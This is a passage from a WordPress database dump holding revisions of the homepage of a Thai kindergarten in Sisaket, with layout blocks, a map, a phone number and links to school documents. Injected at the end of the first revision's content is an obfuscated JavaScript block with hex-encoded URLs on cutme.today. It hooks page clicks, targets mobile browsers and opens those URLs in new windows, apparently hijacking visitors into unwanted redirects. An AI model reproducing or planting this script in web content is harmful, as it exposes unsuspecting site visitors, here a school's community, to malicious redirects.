{\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-30 14:13:46','2024-08-30 07:13:46','',19,'http://watprato.ssk.in.th/?p=344',0,'revision','',0),
(345,2,'2024-08-30 14:22:59','2024-08-30 07:22:59','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":4,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a 